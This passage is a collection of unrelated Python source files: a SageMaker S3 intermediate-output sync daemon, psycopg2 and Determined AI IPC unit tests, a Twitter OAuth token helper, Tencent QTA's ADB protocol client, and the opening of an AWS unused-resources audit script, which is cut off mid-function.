s3_uploader): """As soon as a user is done with a file under `/opt/ml/output/intermediate` we would get notified by using inotify. We would copy this file under `/opt/ml/output/intermediate/.tmp.sagemaker_s3_sync` folder preserving the same folder structure to prevent it from being further modified. As we copy the file we would add timestamp with microseconds precision to avoid modification during s3 upload. After that we copy the file to s3 in a separate Thread. We keep the queue of the files we need to move as FIFO. """ # initialize a thread pool with 1 worker # to be used for uploading files to s3 in a separate thread executor = futures.ThreadPoolExecutor(max_workers=1) last_pass_done = False stop_file_exists = False # after we see stop file do one additional pass to make sure we didn't miss anything while not last_pass_done: # wait for any events in the directory for 1 sec and then re-check exit conditions for event in inotify.read(timeout=1000): for flag in inotify_simple.flags.from_mask(event.mask): # if new directory was created traverse the directory tree to recursively add all # created folders to the watchers list. # Upload files to s3 if there any files. # There is a potential race condition if upload the file and the see a notification # for it which should cause any problems because when we copy files to temp dir # we add a unique timestamp up to microseconds. if flag is inotify_simple.flags.ISDIR and inotify_simple.flags.CREATE & event.mask: for folder, dirs, files in os.walk(os.path.join(intermediate_path, event.name)): wd = inotify.add_watch(folder, watch_flags) relative_path = os.path.relpath(folder, intermediate_path) watchers[wd] = relative_path tmp_sub_folder = os.path.join(tmp_dir_path, relative_path) if not os.path.exists(tmp_sub_folder): os.makedirs(tmp_sub_folder) for file in files: _copy_file(executor, s3_uploader, relative_path, file) elif flag is inotify_simple.flags.CLOSE_WRITE: _copy_file(executor, s3_uploader, watchers[event.wd], event.name) last_pass_done = stop_file_exists stop_file_exists = os.path.exists(success_file_path) or os.path.exists(failure_file_path) # wait for all the s3 upload tasks to finish and shutdown the executor executor.shutdown(wait=True) def start_sync(s3_output_location, region): """Starts intermediate folder sync which copies files from 'opt/ml/output/intermediate' directory to the provided s3 output location as files created or modified. If files are deleted it doesn't delete them from s3. It starts intermediate folder behavior as a daemonic process and only if the directory doesn't exists yet, if it does - it indicates that platform is taking care of syncing files to S3 and container should not interfere. Args: s3_output_location (str): name of the script or module. region (str): the location of the module. Returns: (multiprocessing.Process): the intermediate output sync daemonic process. """ if not s3_output_location or os.path.exists(intermediate_path): logger.debug('Could not initialize intermediate folder sync to s3.') return # create intermediate and intermediate_tmp directories os.makedirs(intermediate_path) os.makedirs(tmp_dir_path) # configure unique s3 output location similar to how SageMaker platform does it # or link it to the local output directory url = urlparse(s3_output_location) if url.scheme == 'file': logger.debug('Local directory is used for output. No need to sync any intermediate output.') return elif url.scheme != 's3': raise ValueError("Expecting 's3' scheme, got: %s in %s" % (url.scheme, url)) # create s3 transfer client client = boto3.client('s3', region) s3_transfer = s3transfer.S3Transfer(client) s3_uploader = { 'transfer': s3_transfer, 'bucket': url.netloc, 'key_prefix': os.path.join(url.path.lstrip('/'), os.environ.get('TRAINING_JOB_NAME', ''), 'output', 'intermediate'), } # Add intermediate folder to the watch list inotify = inotify_simple.INotify() watch_flags = inotify_simple.flags.CLOSE_WRITE | inotify_simple.flags.CREATE watchers = {} wd = inotify.add_watch(intermediate_path, watch_flags) watchers[wd] = '' # start subprocess to sync any files from intermediate folder to s3 p = multiprocessing.Process(target=_watch, args=[inotify, watchers, watch_flags, s3_uploader]) # Make the process daemonic as a safety switch to prevent training job from hanging forever # in case if something goes wrong and main container process exits in an unexpected way p.daemon = True p.start() return p
test_errcodes.py
#!/usr/bin/env python # test_errcodes.py - unit test for psycopg2.errcodes module # # Copyright (C) 2015 Daniele Varrazzo <daniele.varrazzo@gmail.com> # # psycopg2 is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # In addition, as a special exception, the copyright holders give # permission to link this program with the OpenSSL library (or with # modified versions of OpenSSL that use the same license as OpenSSL), # and distribute linked combinations including the two. # # You must obey the GNU Lesser General Public License in all respects for # all of the code used other than OpenSSL. # # psycopg2 is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public # License for more details. from testutils import unittest, ConnectingTestCase try: reload except NameError: from imp import reload from threading import Thread from psycopg2 import errorcodes class ErrocodeTests(ConnectingTestCase): def test_lookup_threadsafe(self): # Increase if it does not fail with KeyError MAX_CYCLES = 2000 errs = [] def f(pg_code='40001'): try: errorcodes.lookup(pg_code) except Exception, e: errs.append(e) for __ in xrange(MAX_CYCLES): reload(errorcodes) (t1, t2) = (Thread(target=f), Thread(target=f)) (t1.start(), t2.start()) (t1.join(), t2.join()) if errs: self.fail( "raised %s errors in %s cycles (first is %s %s)" % ( len(errs), MAX_CYCLES, errs[0].__class__.__name__, errs[0])) def test_suite(): return unittest.TestLoader().loadTestsFromName(__name__) if __name__ == "__main__": unittest.main()
test_ipc.py
import abc import itertools import multiprocessing import sys import textwrap import threading import time import traceback from typing import Any, Callable, List, Optional, cast import pytest import determined as det from determined import ipc class Subproc(multiprocessing.Process): """ Subproc executes an abstract main(), returning the stacktrace as a string in join(). """ def __init__(self, *arg: Any, **kwarg: Any): self._error_queue = multiprocessing.Queue() # type: Any super().__init__(*arg, **kwarg) def run(self) -> None: try: self.main() except Exception: self._error_queue.put(traceback.format_exc()) def join_and_check(self, *args: Any, **kwargs: Any) -> Optional[str]: super().join(*args, **kwargs) if not self._error_queue.empty(): return cast(str, self._error_queue.get()) return None @abc.abstractmethod def main(self) -> None: pass class SubprocGroup(list): """ SubprocGroup provides a context manager to coordinate opening and closing of many Subprocs. """ def join_all(self) -> None: # Every process should be joinable within one second. errors = [subproc.join_and_check() for subproc in self] # Terminate any processes which did not exit in time. num_unterminated = 0 for subproc in self: if subproc.is_alive(): subproc.terminate() subproc.join() num_unterminated += 1 assert num_unterminated == 0 # Make sure none of the processes raised an error. errors = [e for e in errors if e is not None] if len(errors): print("Traceback from child process:", file=sys.stderr) print(textwrap.indent(errors[0], "|"), file=sys.stderr) raise AssertionError("failure in child process") def __enter__(self) -> "SubprocGroup": for subproc in self: subproc.start() return self def __exit__(self, *_: Any) -> None: self.join_all() class BroadcastClientSubproc(Subproc): def __init__( self, rank: int, size: int, pub_url: str, pull_url: str, exp_msgs: List[int] ) -> None: self._rank = rank self._size = size self._pub_url = pub_url self._pull_url = pull_url self._exp_msgs = exp_msgs super().__init__() def main(self) -> None: with ipc.ZMQBroadcastClient(self._pub_url, self._pull_url) as broadcast_client: # Start the server-client communication test. broadcast_client.send(ipc.ConnectedMessage(process_id=0)) for exp in self._exp_msgs: msg = broadcast_client.recv() assert msg == exp broadcast_client.send(2 * msg) def test_broadcast_server_client() -> None: num_subprocs = 3 with ipc.ZMQBroadcastServer(num_connections=num_subprocs) as broadcast_server: pub_url = f"tcp://localhost:{broadcast_server.get_pub_port()}" pull_url = f"tcp://localhost:{broadcast_server.get_pull_port()}" msgs = list(range(10)) with SubprocGroup( BroadcastClientSubproc(i, num_subprocs, pub_url, pull_url, msgs) for i in range(num_subprocs) ) as subprocs: def health_check() -> None: assert all(subproc.is_alive() for subproc in subprocs) for subproc in subprocs: assert subproc.is_alive() gathered, _ = broadcast_server.gather_with_polling(health_check) assert all(isinstance(g, ipc.ConnectedMessage) for g in gathered) for msg in msgs: broadcast_server.broadcast(msg) gathered, _ = broadcast_server.gather_with_polling(health_check) assert all(g == 2 * msg for g in gathered) def test_zmq_server_client() -> None: server = ipc.ZMQServer(num_connections=1, ports=None, port_range=(1000, 65535)) assert len(server.get_ports()) == 1 port = server.get_ports()[0] assert 1000 <= port <= 65535 client = ipc.ZMQClient(ip_address="localhost", port=port) client_object = {"DeterminedAI": "Great", "det": "Fantastic", 12345: -100} client.send(client_object) server_object = server.receive_blocking(send_rank=0) assert server_object == client_object server_object["DeterminedAI"] = "VeryGreat" server.send(server_object) client_object = client.receive() assert server_object == client_object @pytest.mark.parametrize("cross_size", [1, 4]) @pytest.mark.parametrize("local_size", [1, 4]) @pytest.mark.parametrize("force_tcp", [False, True]) def test_distributed_context(cross_size: int, local_size: int, force_tcp: bool) -> None: size = cross_size * local_size def do_parallel(fn: Callable) -> List: """ Run the same function on one-thread-per-rank, assert there were no exceptions, and return the results from each rank. """ results = [None] * size # type: List errors = [None] * size # type: List threads = [] for cross_rank, local_rank in itertools.product(range(cross_size), range(local_size)): rank = cross_rank * local_size + local_rank def _fn(rank: int, cross_rank: int, local_rank: int) -> None: try: results[rank] = fn(rank, cross_rank, local_rank) except Exception: errors[rank] = traceback.format_exc() raise threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank))) for thread in threads: thread.start() for thread in threads: thread.join() assert errors == [None] * size, "not all threads exited without error" return results # Create all of the DistributedContexts. def make_distributed_context(rank: int, cross_rank: int, local_rank: int) -> Any: rank_info = det.RankInfo( rank=cross_rank * local_size + local_rank, size=cross_size * local_size, local_rank=local_rank, local_size=local_size, cross_rank=cross_rank, cross_size=cross_size, ) return det.DistributedContext( rank_info=rank_info, chief_ip="localhost", force_tcp=force_tcp, ) contexts = do_parallel(make_distributed_context) # Perform a broadcast. results = do_parallel(lambda rank, _, __: contexts[rank]._zmq_broadcast(rank)) assert results == [0] * size, "not all threads ran broadcast correctly" # Perform a local broadcast. results = do_parallel(lambda rank, _, __: contexts[rank]._zmq_broadcast_local(rank)) expect = [rank - (rank % local_size) for rank in range(size)] # type: Any assert results == expect, "not all threads ran broadcast_local correctly" # Perform a gather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_gather(rank) or [])) chief = set(range(size)) expect = [set(range(size)) if rank == 0 else set() for rank in range(size)] assert results == [chief] + [set()] * (size - 1), "not all threads ran gather correctly" # Perform a local gather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_gather_local(rank) or [])) expect = [ set(range(rank, rank + local_size)) if rank % local_size == 0 else set() for rank in range(size) ] assert results == expect, "not all threads ran gather correctly" # Perform an allgather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_allgather(rank))) expect = set(range(size)) assert results == [expect] * size, "not all threads ran allgather correctly" # Perform a local allgather. results = do_parallel(lambda rank, _, __: set(contexts[rank]._zmq_allgather_local(rank))) expect = [ set(range(cross_rank * local_size, (cross_rank + 1) * local_size)) for cross_rank, _ in itertools.product(range(cross_size), range(local_size)) ] assert results == expect, "not all threads ran allgather_local correctly" # Close all contexts. for context in contexts: context.close() class TestPIDServer: def test_normal_execution(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() def worker_proc() -> None: with ipc.PIDClient(port) as pid_client: for _ in range(5): pid_client.keep_alive() time.sleep(0.1) procs = [ multiprocessing.Process(target=worker_proc), multiprocessing.Process(target=worker_proc), ] for p in procs: p.start() pid_server.run() for p in procs: p.join() assert len(pid_server.graceful_shutdowns) == 2 def test_worker_crashes(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() # Enforce that the crashed worker causes the exit before the other worker exits. deadline = time.time() + 20 def worker_proc() -> None: with ipc.PIDClient(port): # Wait for the crashing process to cause us to die. time.sleep(30) def crashing_worker_proc() -> None: with ipc.PIDClient(port): time.sleep(0.5) raise ValueError("Crashing...") procs = [ multiprocessing.Process(target=worker_proc), multiprocessing.Process(target=crashing_worker_proc), ] for p in procs: p.start() with pytest.raises(det.errors.WorkerError): pid_server.run() assert time.time() < deadline, "crashing worker did not trigger exit" for p in procs: p.terminate() p.join() assert len(pid_server.graceful_shutdowns) == 0 def test_health_check_pre_connect(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() fail_time = time.time() + 0.2 def worker_proc() -> None: with ipc.PIDClient(port): time.sleep(10) def health_check() -> None: assert time.time() < fail_time # Only one worker to guarantee a failed healthcheck before all workers have connected. procs = [ multiprocessing.Process(target=worker_proc), ] for p in procs: p.start() with pytest.raises(AssertionError): pid_server.run(health_check, poll_period=0.05) for p in procs: p.join() assert len(pid_server.graceful_shutdowns) == 0 def test_health_check_post_connect(self) -> None: with ipc.PIDServer(addr=0, num_clients=2) as pid_server: assert pid_server.listener _, port = pid_server.listener.getsockname() fail_time = time.time() + 0.2 def worker_proc() -> None: with ipc.PIDClient(port): time.sleep(10) def health_check() -> None: assert time.time() < fail_time procs = [ multiprocessing.Process(target=worker_proc), multiprocessing.Process(target=worker_proc), ] for p in procs: p.start() with pytest.raises(AssertionError): pid_server.run(health_check, poll_period=0.05) for p in procs: p.join() assert len(pid_server.graceful_shutdowns) == 0
main.py
from multiprocessing import Process from requests_oauthlib import OAuth1Session from urllib.parse import parse_qsl import webbrowser, argparse ,web_server, pprint CK = "" CS = "" def gen_auth_url(consumer_key, consumer_secret, oauth_callback): print("Generating the URL for authentication...") CK = consumer_key CS = consumer_secret twitter = OAuth1Session(consumer_key, consumer_secret) response = twitter.post( "https://api.twitter.com/oauth/request_token", params={'oauth_callback': oauth_callback} ) request_token = dict(parse_qsl(response.content.decode("utf-8"))) authenticate_url = "https://api.twitter.com/oauth/authenticate" authenticate_endpoint = '%s?oauth_token=%s' \ % (authenticate_url, request_token['oauth_token']) print("Authentication url: "+authenticate_endpoint) webbrowser.open(authenticate_endpoint) print("Waiting for authentication...") proc = Process(target=web_server.run_server) proc.start() def http_callback(list): print("Generating access token...") twitter = OAuth1Session( CK, CS, list[0], list[1], ) response = twitter.post( "https://api.twitter.com/oauth/access_token", params={'oauth_verifier': list[1]} ) access_token = dict(parse_qsl(response.content.decode("utf-8"))) print("Access token token successfully generated!") print("===ACCESS TOKEN===") pprint.pprint(access_token) print("==================") def main() -> None: print("get_twitter_oauth_key\nBy YU-PEI") parser = argparse.ArgumentParser(description='Easy to generate Twitter API OAuth keys.') parser.add_argument('CK', help='TwitterAPI Consumer key') parser.add_argument('CS', help='TwitterAPI Consumer secret') parser.add_argument('callback', help='TwitterAPI OAuth_callback') args = parser.parse_args() gen_auth_url(args.CK, args.CS, args.callback) if __name__ == "__main__": main()
adbclient.py
# -*- coding: UTF-8 -*- # # Tencent is pleased to support the open source community by making QTA available. # Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved. # Licensed under the BSD 3-Clause License (the "License"); you may not use this # file except in compliance with the License. You may obtain a copy of the License at # # https://opensource.org/licenses/BSD-3-Clause # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS # OF ANY KIND, either express or implied. See the License for the specific language # governing permissions and limitations under the License. # '''ADB客户端,用于与ADB守护进程通信 ''' from __future__ import unicode_literals import six import os import time import socket, select import struct import threading from io import BytesIO from qt4a.androiddriver.util import logger, utf8_encode, TimeoutError SYNC_DATA_MAX = 64 * 1024 class AdbError(RuntimeError): pass class Pipe(object): '''模拟实现内存管道 ''' def __init__(self): self._buffer = BytesIO() self._max_buffer_size = 4096 * 16 self._lock = threading.Lock() self._pos = 0 # 当前读指针位置 self._write_buffer = b'' # 保证每次都是整行写 def write(self, s): self._write_buffer += s pos = self._write_buffer.rfind(b'\n') if pos <= 0: return s = self._write_buffer[:pos] self._write_buffer = self._write_buffer[pos:] with self._lock: self._buffer.seek(0, 2) # 将指针置于尾部 self._buffer.write(s) def readline(self): wait = False while True: if wait: time.sleep(0.1) with self._lock: self._buffer.seek(0, 2) buffer_size = self._buffer.tell() if buffer_size <= self._pos: wait = True continue with self._lock: self._buffer.seek(self._pos) ret = self._buffer.readline() if len(ret) == 0: wait = True continue else: self._pos = self._buffer.tell() self._buffer.seek(0, 2) buffer_size = self._buffer.tell() if buffer_size >= self._max_buffer_size: # 创建新的缓冲区 self._buffer.seek(self._pos) buffer = self._buffer.read() self._buffer.close() self._buffer = BytesIO() self._buffer.write(buffer) self._pos = 0 return ret def read(self): '''读取管道中的所有数据 ''' with self._lock: self._buffer.seek(self._pos) result = self._buffer.read() if self._write_buffer: result += self._write_buffer self._write_buffer = '' return result class ADBPopen(object): '''与Popen兼容 ''' class StdinPipe(object): ''' ''' def __init__(self, sock): self._sock = sock def write(self, s): self._sock.send(s) def flush(self): pass def __init__(self, sock, timeout=None): self._sock = sock self._stdin = self.StdinPipe(sock) self._stdout = Pipe() self._stderr = Pipe() self._running = True self._timeout = timeout if self._timeout == None: self._timeout = 0xFFFFFFFF self._event = threading.Event() # 接收完数据的事件通知 self._thread = threading.Thread(target=self._work_thread, args=(), name=self.__class__.__name__) self._thread.setDaemon(True) self._thread.start() @property def stdin(self): return self._stdin @property def stdout(self): return self._stdout @property def stderr(self): return self._stderr @property def pid(self): return self._thread.ident def _work_thread(self): time0 = time.time() while self._running and time.time() - time0 < self._timeout: infds, outfds, errfds = select.select([self._sock, ], [], [], 1) if len(infds) > 0: try: buff = self._sock.recv(4096) if len(buff) == 0: self._sock.close() self._sock = None self._running = False self._event.set() return self._stdout.write(buff) except socket.error as e: logger.info("接收返回数据错误: %s" % (e)) # import traceback # traceback.print_exc() self._stdout.write(b' ') # 通知接收方退出 self._sock.close() self._sock = None self._running = False self._event.set() return self._sock.close() self._sock = None def poll(self): '''是否存在 ''' if self._thread.is_alive(): return None else: return 0 def terminate(self): '''结束 ''' self._running = False time.sleep(1) # 等待线程退出 def communicate(self): ''' ''' while True: if self._event.wait(0.001) == True or self.poll() == 0: if self._running: raise TimeoutError('Execute timeout') return self.stdout.read(), self.stderr.read() # time.sleep(0.001) class ADBClient(object): ''' ''' instance_dict = {} def __init__(self, server_addr='127.0.0.1', server_port=5037): self._server_addr = server_addr self._server_port = server_port self._sock = None self._lock = threading.Lock() @staticmethod def get_client(host, port=5037): '''根据主机名获取ADBClient实例 ''' return ADBClient(host, port) def call(self, cmd, *args, **kwds): '''调用命令字 ''' cmd = cmd.replace('-', '_') if cmd == 'forward' and args[1] == '--remove': method = getattr(self, 'remove_forward') args = list(args) args.pop(1) # remove --remove args else: method = getattr(self, cmd) # print (args) sync = True if 'sync' in kwds: sync = kwds.pop('sync') if 'timeout' in kwds and not cmd in ('shell', 'install', 'uninstall', 'wait_for_device', 'reboot'): kwds.pop('timeout') if sync: ret = None retry_count = kwds.pop('retry_count') i = 0 socket_error_count = 0 while i < retry_count: try: self._lock.acquire() ret = method(*args, **kwds) break except socket.error as e: logger.exception(u'执行%s %s error' % (cmd, ' '.join(args))) socket_error_count += 1 if socket_error_count <= 10: i -= 1 time.sleep(1) except AdbError as e: err_msg = str(e) if 'device not found' in err_msg: return '', 'error: device not found' elif 'cannot bind to socket' in err_msg: return '', err_msg elif 'cannot remove listener' in err_msg: return '', err_msg elif 'device offline' in err_msg: return '', 'error: device offline' elif 'Bad response' in err_msg or 'Device or resource busy' in err_msg or 'closed' in err_msg: # wetest设备有时候会返回closed错误 # 需要重试 logger.exception('Run %s%s %r' % (cmd, ' '.join(args), e)) else: raise RuntimeError(u'执行%s %s 命令失败:%s' % (cmd, ' '.join(args), e)) time.sleep(1) if i >= retry_count - 1: raise e except RuntimeError as e: logger.exception(u'执行%s%s %r' % (cmd, ' '.join(args), e)) if 'device not found' in str(e): self.wait_for_device(args[0], retry_count=1, timeout=300) self._sock = None return self.call(cmd, *args, **kwds) finally: i += 1 if self._sock != None: self._sock.close() self._sock = None self._lock.release() if ret == None: raise TimeoutError(u'Run cmd %s %s failed' % (cmd, ' '.join(args))) if isinstance(ret, (six.string_types, six.binary_type)): return ret, '' else: return ret else: self._transport(args[0]) # 异步操作的必然需要发送序列号 if cmd == 'shell': self._lock.acquire() self._send_command('shell:' + ' '.join(args[1:])) pipe = ADBPopen(self._sock) self._sock = None self._lock.release() return pipe def _connect(self): self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) for i in range(3): try: self._sock.connect((self._server_addr, self._server_port)) return True except socket.error: pass return False def _check_status(self): '''检查返回状态 ''' stat = self._sock.recv(4) if stat == b"OKAY": return True elif stat == b"FAIL": size = int(self._sock.recv(4), 16) val = self._sock.recv(size) self._sock.close() self._sock = None raise AdbError(val.decode('utf8')) else: raise AdbError("Bad response: %r" % (stat,)) def _send_command(self, cmd): data = "%04x%s" % (len(cmd), cmd) if not self._sock: self._connect() # logger.debug('send: %r' % data) self._sock.send(data.encode('utf8')) return self._check_status() def _recv(self, size=None): '''从socket读取数据 ''' result = b'' if size != None: while len(result) < size: result += self._sock.recv(size - len(result)) else: data = self._sock.recv(4096) while data: result += data data = self._sock.recv(4096) return result def send_command(self, cmd): self._send_command(cmd) size = int(self._sock.recv(4), 16) resp = self._sock.recv(size) # logger.debug('recv: %r' % resp[:200]) self._sock.close() self._sock = None return resp.decode('utf8') def _transport(self, device_id): self._send_command('host:transport:%s' % device_id) def devices(self): '''adb devices ''' result = self.send_command('host:devices') return result def shell(self, device_id, cmd, **kwds): '''adb shell ''' cmd_line = 'shell:%s' % cmd self._transport(device_id) self._send_command(cmd_line) result = ADBPopen(self._sock, timeout=kwds['timeout']).communicate() self._sock = None return result def _sync_read_mode(self, remote_path): ''' ''' remote_path = utf8_encode(remote_path) data = b'STAT' + struct.pack(b'I', len(remote_path)) + remote_path self._sock.send(data) result = self._sock.recv(16) if result[:4] != b'STAT': raise AdbError('sync_read_mode error') mode, size, time = struct.unpack(b'III', result[4:]) return mode, size, time def pull(self, device_id, src_file, dst_file): '''adb pull ''' time0 = time.time() self._transport(device_id) self._send_command('sync:') mode, fsize, ftime = self._sync_read_mode(src_file) if mode == 0: self._sock.close() self._sock = None raise AdbError('remote object %r does not exist' % src_file) src_file = utf8_encode(src_file) data = b'RECV' + struct.pack(b'I', len(src_file)) + src_file self._sock.send(data) f = open(dst_file, 'wb') data_size = 0 last_data = b'' while True: result = self._sock.recv(8) if len(result) != 8: logger.warn('返回数据错误:%r' % result) last_data += result if len(last_data) < 8: continue else: result = last_data[:8] last_data = last_data[8:] psize = struct.unpack(b'I', result[4:])[0] # 每个分包大小 if result[:4] == b'DONE': break elif result[:4] == b'FAIL': raise AdbError(self._sock.recv(psize)) elif result[:4] != b'DATA': raise AdbError('pull_file error') result = self._recv(psize - len(last_data)) result = last_data + result if len(result) >= psize: last_data = result[psize:] result = result[:psize] else: raise ValueError('数据长度不一致,期望值:%d 实际值:%d' % (psize, len(result))) f.write(result) data_size += len(result) f.close() self._sock.send(b'QUIT' + struct.pack(b'I', 0)) time_cost = time.time() - time0 self._sock.close() self._sock = None if data_size > 0: return '%d KB/s (%d bytes in %fs)' % (int(data_size / 1000 / time_cost) if time_cost > 0 else 65535, data_size, time_cost) else: return '' def push(self, device_id, src_file, dst_file): '''adb push ''' time0 = time.time() try: st = os.stat(src_file) except OSError as e: if e.errno == 2: raise AdbError("cannot stat '%s': No such file or directory" % src_file) else: raise e self._transport(device_id) self._send_command('sync:') dst_file = utf8_encode(dst_file) mode, fsize, ftime = self._sync_read_mode(dst_file) s = b'%s,%d' % (dst_file, st.st_mode) data = b'SEND' + struct.pack(b'I', len(s)) + s self._sock.send(data) with open(src_file, 'rb') as fp: data = fp.read(SYNC_DATA_MAX) data_size = 0 while data: send_data = b'DATA' + struct.pack(b'I', len(data)) + data self._sock.send(send_data) data_size += len(data) data = fp.read(SYNC_DATA_MAX) data = b'DONE' + struct.pack(b'I', int(st.st_mtime)) self._sock.send(data) result = self._sock.recv(8) if result[:4] == b'OKAY': self._sock.close() self._sock = None time_cost = time.time() - time0 return '%d KB/s (%d bytes in %fs)' % (int(data_size / 1000.0 / time_cost) if time_cost > 0 else 0, data_size, time_cost) elif result[:4] == b'FAIL': msg_len = struct.unpack(b'I', result[4:])[0] error_msg = self._sock.recv(msg_len) self._sock.close() self._sock = None raise AdbError(error_msg) else: self._sock.close() self._sock = None raise RuntimeError('Unexpect data: %r' % result) def install(self, device_id, apk_path, args='', **kwds): '''adb install ''' if not os.path.exists(apk_path): raise AdbError(r'can\'t find %r to install' % apk_path) apk_name = os.path.split(apk_path)[-1] dst_path = '/data/local/tmp/%s' % apk_name self.push(device_id, apk_path, dst_path) cmdline = 'pm install ' + (args + ' ' if args else '') + dst_path result = self.shell(device_id, cmdline, **kwds) return result[0].decode('utf8') def uninstall(self, device_id, package_name, **kwds): '''adb uninstall ''' cmd = 'pm uninstall %s' % package_name result = self.shell(device_id, cmd, **kwds) return result[0].decode('utf8') def forward(self, device_id, local, remote): '''adb forward ''' self._send_command('host-serial:%s:forward:%s;%s' % (device_id, local, remote)) self._sock.close() self._sock = None return '' def remove_forward(self, device_id, local): '''adb forward --remove ''' self._send_command('host-serial:%s:killforward:%s' % (device_id, local)) self._sock.close() self._sock = None return '' def create_tunnel(self, device_id, remote_addr): '''创建与手机中服务端的连接通道 ''' self._transport(device_id) self._sock.settimeout(2) try: self._send_command(remote_addr) except AdbError as e: if 'closed' == e.args[0]: return '' raise except socket.timeout as e: logger.warn('create_tunnel timeout') return '' sock = self._sock self._sock = None return sock def get_state(self, device_id): '''获取设备状态 ''' return self.send_command('host-serial:%s:get-state' % (device_id)) def connect(self, device_id): '''连接设备端口 ''' result = self.send_command('host:connect:%s' % device_id) return 'connected to' in result def disconnect(self, device_id): '''断开设备连接 ''' result = self.send_command('host:disconnect:%s' % device_id) return 'disconnected' in result def reboot(self, device_id, **kwds): '''重启设备 ''' self._transport(device_id) self._sock.settimeout(kwds['timeout']) try: self.send_command('reboot:') except socket.error as e: raise e except: pass return True def wait_for_device(self, device_id, **kwds): '''等待设备 ''' self._send_command('host-serial:%s:wait-for-any' % (device_id)) return ADBPopen(self._sock, timeout=kwds['timeout']).communicate() def snapshot_screen(self, device_id): '''截屏 return: Image.Image ''' from PIL import Image self._transport(device_id) self._send_command('framebuffer:') fb_desc = self._sock.recv(13 * 4) version = struct.unpack_from('I', fb_desc, 0)[0] bpp = struct.unpack_from('I', fb_desc, 4)[0] size = struct.unpack_from('I', fb_desc, 8)[0] width = struct.unpack_from('I', fb_desc, 12)[0] height = struct.unpack_from('I', fb_desc, 16)[0] red_offset = struct.unpack_from('I', fb_desc, 20)[0] red_length = struct.unpack_from('I', fb_desc, 24)[0] # @UnusedVariable blue_offset = struct.unpack_from('I', fb_desc, 28)[0] blue_length = struct.unpack_from('I', fb_desc, 32)[0] # @UnusedVariable green_offset = struct.unpack_from('I', fb_desc, 36)[0] green_length = struct.unpack_from('I', fb_desc, 40)[0] # @UnusedVariable alpha_offset = struct.unpack_from('I', fb_desc, 44)[0] alpha_length = struct.unpack_from('I', fb_desc, 48)[0] if version != 1: raise AdbError("Unsupported version of framebuffer: %s" % version) # detect order util_map = { red_offset: 'R', blue_offset: 'B', green_offset: 'G'} keys = list(util_map.keys()) keys.sort() raw_mode = ''.join([util_map[it] for it in keys]) # detect mode if alpha_length and alpha_offset: mode = 'RGBA' if bpp != 32: raise AdbError("Unsupported RGBA mode, bpp is %s" % bpp) raw_mode += 'A' elif alpha_offset: mode = 'RGBX' if bpp != 32: raise AdbError("Unsupported RGBX mode, bpp is %s" % bpp) raw_mode += 'X' else: mode = 'RGB' if bpp == 16: raw_mode += ';16' elif bpp == 24: pass else: raise AdbError("Unsupported RGB mode, bpp is %s" % bpp) data = b'' while len(data) < size: data += self._sock.recv(4096) self._sock.close() self._sock = None return Image.frombuffer(mode, (width, height), data, 'raw', raw_mode, 0, 1) if __name__ == '__main__': pass
unused_aws_resources.py
""" SYNOPSIS -------- Get the details of unused resources present across regions in the AWS account DESCRIPTION ----------- This script provides a detailed overview of the number of unused resources present in the AWS account. It provides service-wise details of unused resources lying around in all the regions of the AWS account. PREREQUISITES ------------- - Workstation with Python version 3 and above - AWS python-based SDK: boto3 Installation command: pip3 install boto3 - pandas framework and openpyxl for reporting operations (xlsx file). Installation command(s): - pip3 install pandas - pip3 install openpyxl - User credentials (Access Key Id and Secret Accces Key) of a user having atleast the Security Audit permission and above on the AWS account EXAMPLE ------- This script can be executed on a python compiler (AWS Cloudshell, Powershell, bash, any command line tool with python installed) Command: python ./unused_aws_resources.py --accessKey <AWS Access Key Id> --secretKey <AWS Secret Access Key> OUTPUT ------ - The script will provide a summarized count of all unused resources in the account. - For a detailed view, the user can refer to the .xlsx file that will be generated by the script. """ import json import boto3 import argparse import multiprocessing import csv import os import pandas as pd import sys import glob from urllib.request import urlopen def ebs_volume(function, credentials, unused_resource_count, region_list): print('Scanning EBS Volumes') volume_count = 0 unused_volume_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) volumes = list(ec2.volumes.all()) unused_volumes = set([volume.volume_id for volume in volumes if volume.state == 'available']) for volume_id in unused_volumes: unused_volume_detail.append({'ResourceType':'AWS::EC2::Volume','ResourceId':volume_id,'Region':region}) volume_count+=len(unused_volumes) except: pass if volume_count: unused_volume_detail = json.loads(json.dumps(unused_volume_detail)) f = csv.writer(open("./aws_logs/ebs_volume.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_volume_detail in unused_volume_detail: f.writerow([unused_volume_detail["ResourceType"], unused_volume_detail["ResourceId"], unused_volume_detail["Region"]]) unused_resource_count[function] = volume_count def elastic_ip(function, credentials, unused_resource_count, region_list): print('Scanning Elastic IPs') eip_count = 0 unused_eip_detail = [] for region in region_list: try: ec2_client = boto3.client('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) eip_data = ec2_client.describe_addresses()['Addresses'] for eip in eip_data: try: AssociationId = eip['AssociationId'] except: AssociationId = '' if not AssociationId: unused_eip_detail.append({'ResourceType':'AWS::EC2::EIP','ResourceId':eip['AllocationId'],'Region':region}) eip_count += 1 except: pass if eip_count: unused_eip_detail = json.loads(json.dumps(unused_eip_detail)) f = csv.writer(open("./aws_logs/elastic_ip.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_eip_detail in unused_eip_detail: f.writerow([unused_eip_detail["ResourceType"], 